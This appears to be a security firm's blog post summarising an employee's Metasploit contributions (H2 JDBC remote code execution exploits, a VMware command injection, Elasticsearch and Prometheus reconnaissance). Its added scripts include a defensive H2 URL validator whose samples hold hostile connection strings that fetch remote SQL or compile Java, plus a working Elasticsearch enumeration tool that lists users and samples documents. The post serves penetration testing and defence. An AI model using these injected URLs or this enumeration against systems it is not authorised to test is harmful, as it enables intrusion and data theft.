METASPLOIT PROJECT
The Metasploit Project, owned by Rapid7, is the world's most widely used penetration testing framework. The Metasploit Framework is Free and Open-Source Software (FOSS), is used by the large majority of penetration testers, and features heavily in training courses from SANS, EC-Council, and many others.
The Metasploit Project, being open-source software, flourishes on contributions from the community. nDepth's own Mike Cyr (h00die) is a frequent contributor to the project and continues to spend his personal time conducting security research and providing enhancements to Metasploit for the benefit of the security community. This month, h00die contributed the following enhancements:
VMWARE VREALIZE NETWORK INSIGHT REMOTE COMMAND EXECUTION
VMware's vRealize Network Insight product (since renamed VMware Aria Operations for Networks) contains a flaw tracked as CVE-2023-20887, a command injection that lets an unauthenticated attacker execute arbitrary commands on the appliance. An exploit for it was submitted to Metasploit; however, the original author was unable to satisfy all of the project's acceptance requirements to get the module merged. While this doesn't happen often, it can be disappointing, since the code often works and only needs a few minor changes. h00die took the previously submitted code, made the required changes, and got it accepted by the Metasploit project.
H2 DATABASE ENGINE EXPLOITS APLENTY
Often, when a penetration tester learns a new technique or how to exploit a new vulnerability, they will look for other products against which the newly acquired knowledge applies. In this case, the open-source, Java-based database engine H2 was found to be exploitable through the way products let users supply its connection strings: an H2 JDBC URL can carry SQL that runs as soon as the connection is opened, and H2's SQL dialect can execute Java code, so any application that accepts an attacker-controlled H2 connection string becomes a remote code execution path. Armed with this knowledge, h00die created a new exploit against the H2 web interface. It abuses a feature of the database engine rather than a bug, so it is less likely to be fixed by the project than a security flaw would be.
Next, Apache NiFi also allows connections to H2 databases, which can be exploited for remote code execution (CVE-2023-34468). While the vulnerability was public, no proof of concept (exploit code) was available. h00die reversed the vendor's patch to create the first public exploit against Apache NiFi's H2 database connections.
Lastly, Metabase, a business intelligence, dashboarding, and data visualization tool, contained a flaw allowing remote code execution (CVE-2023-38646). The application exposed its 'setup-token', which was only supposed to exist while the software was being set up, to unauthenticated users even after setup was complete. With this token, it was possible to create a new H2 database connection, which then exploited the same vulnerability class as Apache NiFi.
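The common thread in all three exploits above is an H2 JDBC connection string chosen by the attacker. The following script is an added illustration (not code from Metasploit, H2, NiFi or Metabase) of what a defender or reviewer can check for in such a string: it relies on two documented H2 behaviours, the `;INIT=<sql>` URL setting that runs SQL every time a connection is opened, and H2 SQL statements that execute code (`CREATE ALIAS` with inline Java source) or pull more SQL from the network (`RUNSCRIPT FROM 'http://...'`). The URLs, hosts and the allowlist prefix are constructed for the example.

```python
"""Flag H2 JDBC connection strings that carry executable SQL.

Added illustration, not code from Metasploit, NiFi, Metabase or H2.
All URLs, hosts and names below are constructed for the example.
"""
import re

# H2 separates URL settings with ';'; a literal ';' inside a setting is escaped as '\;'
_SETTING_SPLIT = re.compile(r"(?<!\\);")

# SQL constructs that turn "open a database" into "run attacker-supplied code"
_DANGEROUS_SQL = (
    (re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\b", re.I),
     "CREATE ALIAS compiles inline Java source and exposes it as a SQL function"),
    (re.compile(r"\bRUNSCRIPT\s+FROM\b", re.I),
     "RUNSCRIPT FROM executes SQL loaded from a file or URL"),
)


def parse_h2_url(url):
    """Split 'jdbc:h2:<location>;KEY=value;...' into (location, {KEY: value})."""
    if not url.lower().startswith("jdbc:h2:"):
        raise ValueError("not an H2 JDBC URL")
    parts = _SETTING_SPLIT.split(url[len("jdbc:h2:"):])
    settings = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        settings[key.strip().upper()] = value.replace("\\;", ";")
    return parts[0], settings


def h2_url_findings(url):
    """Return human-readable reasons a caller-supplied H2 URL is dangerous."""
    location, settings = parse_h2_url(url)
    findings = []
    if location.lower().startswith(("tcp:", "ssl:")):
        findings.append("location connects to a remote H2 server chosen by the caller")
    init = settings.get("INIT")
    if init is not None:
        findings.append("INIT setting runs SQL on every connect")
        for pattern, why in _DANGEROUS_SQL:
            if pattern.search(init):
                findings.append(why)
    return findings


def accept_h2_url(url, allowed_location_prefix, allowed_settings=("MODE", "DB_CLOSE_DELAY")):
    """Allowlist check an application could apply before handing a user-supplied URL
    to the JDBC driver: the database must live under the expected location and only
    harmless settings may appear (INIT is never in the allowlist)."""
    try:
        location, settings = parse_h2_url(url)
    except ValueError:
        return False
    if not location.startswith(allowed_location_prefix):
        return False
    return all(key in allowed_settings for key in settings)


# Constructed sample inputs: one benign, two of the kind the exploits above rely on.
SAMPLE_URLS = [
    "jdbc:h2:file:/var/lib/app/data;MODE=PostgreSQL",
    "jdbc:h2:mem:probe;INIT=RUNSCRIPT FROM 'http://203.0.113.9/x.sql'",
    "jdbc:h2:mem:probe;INIT=CREATE ALIAS EXEC AS $$ /* java source */ $$\\;SELECT 1",
]

if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        print(sample)
        print("  accepted:", accept_h2_url(sample, "file:/var/lib/app/"))
        for finding in h2_url_findings(sample):
            print("  -", finding)
```

The allowlist is deliberately stricter than the findings check: rejecting any setting not explicitly permitted is the only robust defence, because H2's SQL surface is large and a denylist of statement keywords will always lag behind it.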
ELASTICSEARCH ENUMERATION ENHANCEMENTS
Elasticsearch is a search and analytics engine that behaves much like a database. Metasploit contains an enumeration module for Elasticsearch meant to gather information about the service and present it to the user. However, h00die found that it needed some enhancements: it only identified index aliases (short names for indices) and didn't work against servers that require authentication. The module was enhanced to allow the user to provide credentials, gather the service's version number, gather information about the cluster (several servers combined for speed and resilience), gather information about each node in the cluster, list all users, and, lastly, download a sample of documents from each index.
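The enumeration sequence described above, written out as an added example (this is not the Metasploit module's code). The endpoints are Elasticsearch's documented REST API (`/`, `/_cluster/health`, `/_nodes`, `/_security/user`, `/_cat/indices`, `/<index>/_search`); the `fetch` callable is injected so the same logic runs against a live server with HTTP basic auth or against the constructed, heavily trimmed sample responses embedded below.

```python
"""Enumerate an Elasticsearch service the way a pentester wants to read it.

Added example, not the Metasploit module's own code.  SAMPLE_RESPONSES are
constructed and trimmed; real responses carry far more fields.
"""
import base64
import json
import urllib.request


def http_fetcher(base_url, username=None, password=None, timeout=10):
    """Return fetch(path) that GETs base_url+path and parses the JSON body.
    Basic auth is attached when credentials are given, which is what the
    enhanced module adds over the unauthenticated original."""
    headers = {"Accept": "application/json"}
    if username is not None:
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        headers["Authorization"] = f"Basic {token}"

    def fetch(path):
        req = urllib.request.Request(base_url.rstrip("/") + path, headers=headers)
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp)
    return fetch


def enumerate_es(fetch, sample_size=2):
    """Collect version, cluster, node, user and per-index sample information.
    fetch(path) must return parsed JSON.  The user listing is optional: it
    fails when security is disabled or the credentials lack the privilege,
    and that is recorded rather than aborting the run."""
    result = {}
    root = fetch("/")
    result["version"] = root["version"]["number"]
    result["cluster_name"] = root["cluster_name"]
    health = fetch("/_cluster/health")
    result["cluster"] = {k: health[k] for k in ("status", "number_of_nodes", "number_of_data_nodes")}
    result["nodes"] = [
        {"name": n.get("name"), "ip": n.get("ip"), "version": n.get("version"), "roles": n.get("roles", [])}
        for n in fetch("/_nodes")["nodes"].values()
    ]
    try:
        result["users"] = sorted(fetch("/_security/user"))  # response is keyed by username
    except Exception as exc:
        result["users"] = f"unavailable ({exc.__class__.__name__})"
    result["indices"] = {}
    for idx in fetch("/_cat/indices?format=json"):
        name = idx["index"]
        hits = fetch(f"/{name}/_search?size={sample_size}")["hits"]["hits"]
        result["indices"][name] = {"docs": idx.get("docs.count"), "sample": [h["_source"] for h in hits]}
    return result


# Constructed sample responses standing in for a small single-node cluster.
SAMPLE_RESPONSES = {
    "/": {"name": "node-1", "cluster_name": "lab-cluster", "version": {"number": "7.17.9"}},
    "/_cluster/health": {"cluster_name": "lab-cluster", "status": "yellow",
                         "number_of_nodes": 1, "number_of_data_nodes": 1},
    "/_nodes": {"nodes": {"a1b2": {"name": "node-1", "ip": "10.0.0.5", "version": "7.17.9",
                                   "roles": ["master", "data"]}}},
    "/_security/user": {"elastic": {"roles": ["superuser"]}, "kibana_system": {"roles": ["kibana_system"]}},
    "/_cat/indices?format=json": [{"health": "yellow", "index": "customers", "docs.count": "2"}],
    "/customers/_search?size=2": {"hits": {"hits": [{"_source": {"email": "a@example.test"}},
                                                    {"_source": {"email": "b@example.test"}}]}},
}


def sample_fetch(path):
    """Offline stand-in for http_fetcher(); unknown paths behave like an HTTP error."""
    if path not in SAMPLE_RESPONSES:
        raise KeyError(path)
    return SAMPLE_RESPONSES[path]


if __name__ == "__main__":
    # Against a real target: enumerate_es(http_fetcher("http://10.0.0.5:9200", "elastic", "..."))
    print(json.dumps(enumerate_es(sample_fetch), indent=2))
```

Sampling documents is the step that most often turns an "open Elasticsearch" finding into a demonstrable data exposure, so keep `sample_size` small and record which indices were read; the output is the evidence that goes in the report.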
APACHE NIFI PROCESSOR EXPLOIT ENHANCEMENTS
While testing the Apache NiFi H2 exploit, h00die noticed that the documentation for the Apache NiFi processor exploit module did not state which versions it works against. Although that exploit takes advantage of a feature rather than a security flaw, knowing which versions it is known to work against is invaluable to a penetration tester. h00die added the previously tested version numbers and the version he was working with to the documentation.
PROMETHEUS API, NODE EXPORTER, AND WINDOWS EXPORTER INFORMATION GATHERING
During a penetration test, h00die came across Prometheus. Prometheus is a monitoring system and time series database; it plays a role similar to SNMP monitoring, but it pulls (scrapes) metrics over HTTP and bundles querying and graphing into one product. Prometheus Node Exporter (Linux/Unix) and Prometheus Windows Exporter expose host-level metrics (hostname, OS and kernel, network addresses, filesystems, running services, and much more) for Prometheus to collect, much as an SNMP agent does. When a penetration tester finds any of these services, they are presented with thousands to tens of thousands of lines of information to analyze. After determining which of that information is useful to a penetration tester, h00die created two modules that extract and display just that information, saving a substantial amount of analysis time.
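As an added example of the filtering the paragraph describes (this is not the code of either Metasploit module), the script below parses the Prometheus text exposition format that Node Exporter and Windows Exporter serve on `/metrics` and keeps only the handful of facts a tester looks for first. The two scrapes are constructed and trimmed to a dozen lines; the metric and label names follow the exporters' documented output but are an assumption, since they vary across exporter versions.

```python
"""Pull the pentester-relevant facts out of a Prometheus exporter scrape.

Added illustration, not the Metasploit modules' own code.  NODE_SAMPLE and
WINDOWS_SAMPLE are constructed; metric and label names are assumed to match
the exporters' documented output and may differ between versions.
"""
import re

_SAMPLE_RE = re.compile(
    r'^([A-Za-z_:][A-Za-z0-9_:]*)'               # metric name
    r'(?:\{((?:[^"}]|"(?:\\.|[^"\\])*")*)\})?'   # optional {labels}; quoted values may contain '}'
    r'\s+(\S+)'                                   # value (float, NaN, +Inf)
)
_LABEL_RE = re.compile(r'([A-Za-z_][A-Za-z0-9_]*)="((?:\\.|[^"\\])*)"')


def _unescape(value):
    return value.replace('\\"', '"').replace('\\n', '\n').replace('\\\\', '\\')


def parse_exposition(text):
    """Return [(metric_name, labels_dict, float_value)] for each sample line;
    comments, HELP/TYPE lines, blanks and malformed lines are skipped."""
    samples = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        match = _SAMPLE_RE.match(line)
        if not match:
            continue
        name, raw_labels, raw_value = match.groups()
        labels = {k: _unescape(v) for k, v in _LABEL_RE.findall(raw_labels or '')}
        samples.append((name, labels, float(raw_value)))
    return samples


def summarize_host(samples):
    """Reduce a Node Exporter or Windows Exporter scrape to host identity,
    OS/kernel, routable addresses, filesystems and running services."""
    info = {"hostname": None, "os": None, "kernel": None,
            "addresses": [], "filesystems": [], "running_services": []}
    for name, labels, value in samples:
        if name == "node_uname_info":
            info["hostname"] = labels.get("nodename")
            info["kernel"] = f"{labels.get('sysname')} {labels.get('release')}"
        elif name == "node_os_info":
            info["os"] = labels.get("pretty_name")
        elif name == "node_network_address_info" and labels.get("scope") != "host":
            info["addresses"].append(f"{labels['address']}/{labels['netmask']} ({labels['device']})")
        elif name == "node_filesystem_size_bytes":
            info["filesystems"].append((labels.get("mountpoint"), labels.get("fstype"), round(value / 2**30, 1)))
        elif name == "node_systemd_unit_state" and labels.get("state") == "active" and value == 1:
            info["running_services"].append(labels["name"])
        elif name == "windows_cs_hostname":
            info["hostname"] = labels.get("fqdn") or labels.get("hostname")
        elif name == "windows_os_info":
            info["os"], info["kernel"] = labels.get("product"), labels.get("version")
        elif name == "windows_service_state" and labels.get("state") == "running" and value == 1:
            info["running_services"].append(labels["name"])
    return info


# Constructed scrapes (a real one runs to thousands of lines).
NODE_SAMPLE = """\
# HELP node_uname_info Labeled system information as provided by the uname system call.
# TYPE node_uname_info gauge
node_uname_info{domainname="(none)",machine="x86_64",nodename="db01",release="5.15.0-91-generic",sysname="Linux",version="#101-Ubuntu SMP"} 1
node_os_info{id="ubuntu",id_like="debian",name="Ubuntu",pretty_name="Ubuntu 22.04.3 LTS",version_id="22.04"} 1
node_network_address_info{address="10.0.4.12",device="eth0",netmask="24",scope="global"} 1
node_network_address_info{address="127.0.0.1",device="lo",netmask="8",scope="host"} 1
node_filesystem_size_bytes{device="/dev/sda1",fstype="ext4",mountpoint="/"} 5.36870912e+10
node_systemd_unit_state{name="sshd.service",state="active",type="simple"} 1
node_systemd_unit_state{name="sshd.service",state="inactive",type="simple"} 0
node_systemd_unit_state{name="cups.service",state="active",type="simple"} 0
node_boot_time_seconds 1.7e+09
"""

WINDOWS_SAMPLE = """\
windows_cs_hostname{domain="corp.example",fqdn="fs01.corp.example",hostname="FS01"} 1
windows_os_info{product="Microsoft Windows Server 2019 Standard",version="10.0.17763"} 1
windows_service_state{name="TermService",state="running"} 1
windows_service_state{name="TermService",state="stopped"} 0
"""

if __name__ == "__main__":
    for scrape in (NODE_SAMPLE, WINDOWS_SAMPLE):
        for key, val in summarize_host(parse_exposition(scrape)).items():
            print(f"{key:17} {val}")
        print()
```

Note the systemd handling: the exporter emits one sample per (unit, state) pair, so the unit's current state is the one whose value is 1, not merely the one labelled `active`; the same applies to `windows_service_state`. Getting that wrong is the most common mistake when eyeballing a raw scrape.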
To view this month’s contributions, check the following links:
- https://github.com/rapid7/metasploit-framework/pull/18310
- https://github.com/rapid7/metasploit-framework/pull/18290
- https://github.com/rapid7/metasploit-framework/pull/18257
- https://github.com/rapid7/metasploit-framework/pull/18239
- https://github.com/rapid7/metasploit-framework/pull/18232
- https://github.com/rapid7/metasploit-framework/pull/18226
- https://github.com/rapid7/metasploit-framework/pull/18199